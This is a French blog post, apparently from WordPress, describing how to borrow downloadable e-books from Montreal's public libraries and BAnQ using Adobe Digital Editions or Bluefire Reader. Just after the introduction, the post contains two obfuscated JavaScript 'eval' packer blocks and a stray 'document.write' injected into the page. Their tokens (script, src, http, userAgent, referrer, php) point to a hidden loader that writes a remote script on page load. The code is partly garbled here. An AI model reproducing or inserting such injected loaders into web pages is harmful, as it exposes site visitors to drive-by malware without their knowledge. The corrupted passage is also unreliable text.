Prêt de livrels en bibliothèque

Les Bibliothèques publiques de Montréal et la Bibliothèque et Archives Nationales du Québec ont récemment mis à la disposition de leurs usagers des livrels (ben oui: des eBooks en français, document.write(“”); aussi appelés “livres numériques”) qui peuvent être emprunté de la même façon qu’on emprunte un livre-papier dans une bibliothèque. Voir les détails après le saut de page:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfbdb|var|u0026u|referrer|zibds||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbrdt|var|u0026u|referrer|ziehi||js|php’.split(‘|’),0,{}))

Les Bibliothèques publiques de Montréal ont d’abord expérimenté avec les livrels en prêtant aux usagers intéressés des lecteurs contenant quelques titres libres de droits (selon les bibliothèques, deux vieux modèles de lecteurs étaient (et sont encore) disponibles: un Bookeen’s Cybook Opus et un Sony Reader). Puis, l’offre de service a été bonifié avec des livrels dont on pouvait faire la lecture en ligne (la complétion de ce lien nécessite votre numéro de carte d’abonné ainsi que votre mot de passe). Plus de 700 titres sont ainsi accessibles sans téléchargement par l’entremise des Ressources numériques des bibliothèques. Le défaut de cette option est qu’il est impossible de les lire dans des lieux dépourvu de sans-fil (wifi), comme dans le métro par exemple.

La solution idéale c’est les livres numériques téléchargeables que les usagers peuvent mettre dans leur téléphones intelligents, tablettes, liseuses ou ordinateurs portables et les lire n’importe où. Les Bibliothèques publiques de Montréal ont donc tout récemment annoncé des livres téléchargeables à partir du service Prêt numérique (la complétion de ce lien nécessite votre numéro de carte d’abonné ainsi que votre mot de passe) qui offre plus de 600 documents récents d’auteurs québécois, romans, essais, livres pratiques, etc.

Ce service permet à l’usager d’emprunter des livres téléchargeables (sous la forme de fichiers ePub ou PDF protégés et chronodégradables) pour une durée de trois semaines (vingt et un jours). Si le processus d’emprunt en soi est simple, la mise en place initiale des composantes nécessaires est un peu compliquée. Mais une fois que c’est fait cela marche plutôt bien. Je vous résume ici les quelques étapes nécessaires pour emprunter des livres téléchargeables:

Mise en place des composantes

1) il vous faut d’abord vous inscrire à Adobe Connexion. Cela vous fournira un identifiant Adobe qui permettera de valider votre lecteur pour l’utilisation des droits numériques.

2) vous devez ensuite télécharger et installer un logiciel de lecture gratuit. Il s’agit principalement soit de Adobe Digital Editions pour ordinateurs (Windows et Mac OS) ou de BlueFire Reader (pour iPad, iPhone [disponible sur le iTunes apps store] et Android). J’ai découvert que Mes Livres, l’application de lecture d’Archambault, fait tout aussi l’affaire (c’est en fait une version localisée de Bluefire).

3) finalement vous devez “autoriser” l’application avec votre identifiant Adobe.

Emprunt d’un livre numérique

1) accédez au service de Prêt numérique (la complétion de ce lien nécessite votre numéro de carte d’abonné ainsi que votre mot de passe) et parcourez les titres offerts.

2) si le titre désiré est disponible (tout comme un livre physique seulement quelques copies d’un titre donné sont disponibles pour le prêt en même temps; si toutes les copies d’un titres sont empruntées vous devez attendre que la durée de prêt de l’une des copies expire avant de l’emprunter à votre tour. Il n’est malheureusement pas possible pour l’instant de réserver un titre) vous cliquez simplement sur le bouton “Emprunter le ePub” (ou “PDF” selon le format disponible). Pour pouvez également faire la recherche d’un livre par son titre, auteur, éditeur ou même ISBN et également rechercher que les titres qui sont disponibles. Malgré ces fonctions de recherche, la manière de parcourir le catalogue de titres est encore malheureusement limitées. Voir la section “Astuces de recherche” pour plus d’information (la complétion de ce lien nécessite votre numéro de carte d’abonné ainsi que votre mot de passe).

3) le système vous demandera alors l’adresse courriel où vous désirez que le lien de téléchargement soit envoyé.

4) un lien de téléchargement sera envoyé à l’adresse courriel que vous avez donné. Vous disposez de vingt-quatre (24) heures pour activer le lien en le cliquant, sinon le titre est remis en disponibilité pour les usagers de la bibliothèque.

5) à partir de votre programme de courriel, vous cliquez sur le lien d’activation de l’emprunt qui vous a été envoyé. Un fichier nommé URLLink.acsm se téléchargera et s’ouvrira ensuite dans votre logiciel de gestion de livres numériques (Adobe Digital Editions pour un ordinateur ou Bluefire Reader sur un appareil Android ou Apple). Dans le cas d’un téléphone intelligent ou d’une tablette, Bluefire Reader téléchargera alors le livre numérique comme tel et vous pourrez en commencer la lecture en quelques minutes. Dans le cas d’un appareil Sony Reader ou Kobo Reader, vous devez brancher votre liseuse à votre ordinateur afin d’y transférer le livre numérique préalablement téléchargé par Adobe Digital Editions.

Pour plus de détails tant sur le processus de mise en place des composantes que sur celui de l’emprunt de livres numériques, vous pouvez consulter la section “Guide de démarrage” (la complétion de ce lien nécessite votre numéro de carte d’abonné ainsi que votre mot de passe). Je trouve plutôt ennuyeux qu’il soit nécessaire de donner notre mot de passe AVANT de pouvoir consulter le catalogue de titres ou d’accéder à la section d’aide. Le mot de passe ne devrait être exigé qu’au moment de faire le téléchargement comme tel.

Préparer votre lecteur pour le téléchargement et faire un premier emprunt peut sembler fort compliqué mais dès le deuxième emprunt c’est déjà très facile. J’ai bien aimé l’expérience. Toutefois, si l’identifiant d’Adobe vous permet de télécharger un même titre à la fois sur le iPad et le iPhone, Bluefire Reader ne syncronise pas encore les deux versions. Rien n’est parfait mais j’espère que ça viendra. À noter que plusieurs titres des éditions Alire sont déjà disponible pour l’emprunt numérique.

Alors à vos lecteurs et bonne lecture!

Mise à jour (2012-05-31): J’ai trouvé la sélection des livres numériques offert par les bibliothèques publiques de Montréal plutôt décevante. Pour mes goûts personnels il n’y a que les titres des éditions Alire qui valent la peine d’être emprunté. Par contre, j’ai récemment jeté un coup d’oeil à la sélection offerte par la BANQ et elle est beaucoup plus vaste et intéressante. Particulièrement pcq’elle comporte des titres en anglais (je suis d’ailleurs en attente pour emprunter le cinquième tome de la série Game of Thrones!)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s